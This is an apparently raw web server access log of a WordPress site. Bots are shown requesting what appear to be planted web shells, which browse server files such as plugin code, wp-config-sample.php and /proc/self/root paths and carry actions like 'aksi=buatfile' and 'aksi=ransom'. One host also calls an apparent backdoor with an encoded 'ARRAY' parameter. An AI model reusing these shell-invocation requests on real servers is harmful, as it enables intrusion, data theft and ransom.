20.171.207.175 - - [15/Jun/2025:08:06:03 -0400] "GET /aquilegia836469328.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fincludes%2Findex.php&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fincludes HTTP/1.1" 200 2073 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:08:06:04 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8%2Fnfsconf.8.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8 HTTP/1.1" 200 3360 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:08:06:05 -0400] "GET /aquilegia836469328.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fincludes%2Fclass-disqus-deactivator.php&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fincludes HTTP/1.1" 200 2338 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.222.253.14 - - [15/Jun/2025:08:06:07 -0400] "GET /sitemap-item-1373.xml HTTP/1.1" 200 12514 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.216.154 - - [15/Jun/2025:08:05:57 -0400] "GET /mediae1022309200.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Ferror_log&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
20.171.207.66 - - [15/Jun/2025:08:06:06 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8%2Fpam_faillock.8.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8 HTTP/1.1" 200 4915 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:08:06:07 -0400] "GET /aquilegia836469328.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fincludes%2Fclass-disqus.php&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fincludes HTTP/1.1" 200 4070 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.154 - - [15/Jun/2025:08:06:08 -0400] "GET /witchhazel/sc1468151362.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-activate.php&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com HTTP/1.1" 200 2002 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
20.171.207.66 - - [15/Jun/2025:08:06:08 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8%2Fpwconv.8.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8 HTTP/1.1" 200 4154 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:08:06:10 -0400] "GET /biparous836481088.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fincludes%2Fclass-disqus.php&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fincludes HTTP/1.1" 200 4070 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.222.253.14 - - [15/Jun/2025:08:06:11 -0400] "GET /sitemap-item-1376.xml HTTP/1.1" 200 12646 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
20.171.207.66 - - [15/Jun/2025:08:06:10 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8%2Fdhclient.8.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8 HTTP/1.1" 200 9337 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:08:06:12 -0400] "GET /aquilegia836469328.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fincludes%2Fclass-disqus-loader.php&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fincludes HTTP/1.1" 200 3062 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:08:06:12 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8%2Ffilefrag.8.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8 HTTP/1.1" 200 2891 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
34.196.6.199 - - [15/Jun/2025:08:06:11 -0400] "GET /?filesrc=//lib64/libFLAC%20%20.so.6.3.0&path=//lib64 HTTP/1.1" 200 20036 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.175 - - [15/Jun/2025:08:06:14 -0400] "GET /biparous836481088.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fincludes%2Fclass-disqus-loader.php&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fincludes HTTP/1.1" 200 3062 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:08:06:14 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8%2Fpartx.8.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8 HTTP/1.1" 200 4186 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.222.253.2 - - [15/Jun/2025:08:06:16 -0400] "GET /sitemap-item-1444.xml HTTP/1.1" 200 12482 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
20.171.207.175 - - [15/Jun/2025:08:06:15 -0400] "GET /biparous836481088.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fincludes%2Findex.php&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fincludes HTTP/1.1" 200 2073 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:08:06:16 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8%2Fmariadbd.8.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8 HTTP/1.1" 200 2098 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:08:06:17 -0400] "GET /biparous836481088.shtml?aksi=buatfile&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fincludes HTTP/1.1" 200 2626 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:08:06:18 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8%2Fnfsstat.8.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8 HTTP/1.1" 200 3781 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:08:06:18 -0400] "GET /aquilegia836469328.shtml?aksi=ransom&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fadmin%2Fpartials HTTP/1.1" 200 2622 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.222.253.9 - - [15/Jun/2025:08:06:20 -0400] "GET /sitemap-item-1464.xml HTTP/1.1" 200 12500 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
20.171.207.66 - - [15/Jun/2025:08:06:19 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8%2Frtmon.8.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8 HTTP/1.1" 200 3082 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:08:06:21 -0400] "GET /aquilegia836469328.shtml?aksi=buatfolder&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fadmin%2Fcss HTTP/1.1" 200 2123 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:08:06:21 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8%2Fgroupadd.8.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8 HTTP/1.1" 200 4612 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
98.84.60.17 - - [15/Jun/2025:08:06:19 -0400] "GET /?filesrc=//lib64/libev.so.4.0.0&path=//lib64 HTTP/1.1" 200 45876 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
162.0.232.193 - - [15/Jun/2025:08:04:45 -0400] "GET /wp-content/themes/twentynineteen/sass/layout/layout/index.php?ARRAY=7o2230223n313734393939323638352p2231223n22687474703n5p2s5p2s7n7331393176313379612r63616p776973652r626s6174735p2s3s6p633q7068705s636s64655s6n6326743q313734393938393038352q6131643261373538616434356231363063336430306263623232353134396636222p2232223n223234336632316336393733616437393438653632616638643836363463346466222p2233223n226638613531633563383166656138353739393038393634373032363437643264222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33332q36302q36382q37332q38372q3135227q HTTP/1.1" 200 0 "-" "-"
51.222.253.9 - - [15/Jun/2025:08:06:25 -0400] "GET /sitemap-item-1487.xml HTTP/1.1" 200 12567 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
20.171.207.175 - - [15/Jun/2025:08:06:24 -0400] "GET /revile231955198.shtml?path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fadmin HTTP/1.1" 200 2724 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:08:06:24 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8%2Flsblk.8.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8 HTTP/1.1" 200 4325 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:08:06:26 -0400] "GET /biparous836481088.shtml?path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fpublic%2Fjs HTTP/1.1" 200 2549 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:08:06:26 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8%2Fsg_readcap.8.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8 HTTP/1.1" 200 5043 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:08:06:28 -0400] "GET /aquilegia836469328.shtml?path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Frest-api HTTP/1.1" 200 2526 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:08:06:29 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8%2Fshutdown.8.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8 HTTP/1.1" 200 3296 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.222.253.11 - - [15/Jun/2025:08:06:30 -0400] "GET /sitemap-item-1497.xml HTTP/1.1" 200 12562 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
20.171.207.175 - - [15/Jun/2025:08:06:30 -0400] "GET /biparous836481088.shtml?path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fadmin%2Fcss HTTP/1.1" 200 2626 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:08:06:31 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8%2Fsetvtrgb.8.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8 HTTP/1.1" 200 2720 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.154 - - [15/Jun/2025:08:06:32 -0400] "GET /stethoscopically1467827558.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fxmlrpc.php&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com HTTP/1.1" 200 3455 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
20.171.207.175 - - [15/Jun/2025:08:06:32 -0400] "GET /revile231955198.shtml?aksi=buatfolder&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fpublic HTTP/1.1" 200 2123 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:08:06:33 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8%2Fnfsdclddb.8.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8 HTTP/1.1" 200 2997 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.154 - - [15/Jun/2025:08:06:33 -0400] "GET /saccharate1410400682.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-config-sample.php&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com HTTP/1.1" 200 3225 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
20.171.207.175 - - [15/Jun/2025:08:06:34 -0400] "GET /cuskin836627940.shtml?aksi=buatfile&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fincludes HTTP/1.1" 200 2626 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.222.253.1 - - [15/Jun/2025:08:06:35 -0400] "GET /sitemap-item-1525.xml HTTP/1.1" 200 12427 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
20.171.207.66 - - [15/Jun/2025:08:06:35 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8%2Fgroupmod.8.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8 HTTP/1.1" 200 4229 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.154 - - [15/Jun/2025:08:06:35 -0400] "GET /cardinalis1458239430.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-mail.php&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com HTTP/1.1" 200 5140 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
20.171.207.175 - - [15/Jun/2025:08:06:35 -0400] "GET /cuskin836627940.shtml?aksi=buatfolder&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fpublic HTTP/1.1" 200 2123 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:08:06:36 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8%2Fnamed.8.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8 HTTP/1.1" 200 6406 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:08:06:37 -0400] "GET /biparous836481088.shtml?aksi=buatfile&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fpublic HTTP/1.1" 200 2676 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
44.221.180.179 - - [15/Jun/2025:08:06:36 -0400] "GET /?filesrc=//lib64/libevent-2.1.so.6&path=//lib64 HTTP/1.1" 200 166026 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.154 - - [15/Jun/2025:08:06:37 -0400] "GET /educed1457380152.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-config-sample.php&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com HTTP/1.1" 200 3225 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
20.171.207.66 - - [15/Jun/2025:08:06:38 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8%2Fpam_selinux.8.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8 HTTP/1.1" 200 3916 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:08:06:38 -0400] "GET /cuskin836627940.shtml?path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fadmin HTTP/1.1" 200 2724 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.222.253.8 - - [15/Jun/2025:08:06:39 -0400] "GET /sitemap-item-1588.xml HTTP/1.1" 200 12464 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
20.171.207.66 - - [15/Jun/2025:08:06:39 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8%2Fmkfs.8.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8 HTTP/1.1" 200 3356 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:08:06:39 -0400] "GET /aquilegia836469328.shtml?aksi=buatfile&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fadmin%2Fbundles%2Fjs HTTP/1.1" 200 2690 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:08:06:40 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8%2Fgrpconv.8.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8 HTTP/1.1" 200 2102 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:08:06:41 -0400] "GET /revile231955198.shtml?path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fadmin%2Fbundles HTTP/1.1" 200 2478 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:08:06:42 -0400] "GET /revile231955198.shtml?path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fadmin%2Fpartials HTTP/1.1" 200 2622 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:08:06:42 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8%2Fsetsebool.8.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8 HTTP/1.1" 200 2732 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:08:06:43 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8%2Fsudoedit.8.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8 HTTP/1.1" 200 12835 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:08:06:43 -0400] "GET /aquilegia836469328.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Frest-api%2Fclass-disqus-rest-api.php&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Frest-api HTTP/1.1" 200 10717 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.222.253.18 - - [15/Jun/2025:08:06:44 -0400] "GET /sitemap-item-1610.xml HTTP/1.1" 200 12405 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
20.171.207.66 - - [15/Jun/2025:08:06:44 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8%2Fsg_sanitize.8.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8 HTTP/1.1" 200 5872 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:08:06:44 -0400] "GET /biparous836481088.shtml?path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fadmin%2Fcss%2Fcomment-editor HTTP/1.1" 200 2196 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
162.0.232.193 - - [15/Jun/2025:08:05:06 -0400] "GET /wp-content/themes/twentynineteen/sass/layout/layout/index.php?ARRAY=7o2230223n313734393939323730362p2231223n22687474703n5p2s5p2s7n7331393176313379612r63616p776973652r626s6174735p2s3s6p633q7068705s636s64655s6n6326743q313734393938393130362q3036346162643037633637383134633437666661653030633766343266396262222p2232223n223234336632316336393733616437393438653632616638643836363463346466222p2233223n226638613531633563383166656138353739393038393634373032363437643264222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33332q36302q36382q37332q38372q3135227q HTTP/1.1" 200 0 "-" "-"
20.171.207.175 - - [15/Jun/2025:08:06:46 -0400] "GET /aquilegia836469328.shtml?aksi=ransom&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fadmin%2Fbundles%2Fjs HTTP/1.1" 200 2690 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:08:06:46 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8%2Fpam_permit.8.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8 HTTP/1.1" 200 3192 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:08:06:47 -0400] "GET /biparous836481088.shtml?aksi=buatfile&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fadmin%2Fbundles%2Fjs HTTP/1.1" 200 2690 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:08:06:47 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8%2Fdnf-repograph.8.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8 HTTP/1.1" 200 2896 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:08:06:48 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8%2Fexportfs.8.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8 HTTP/1.1" 200 5035 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
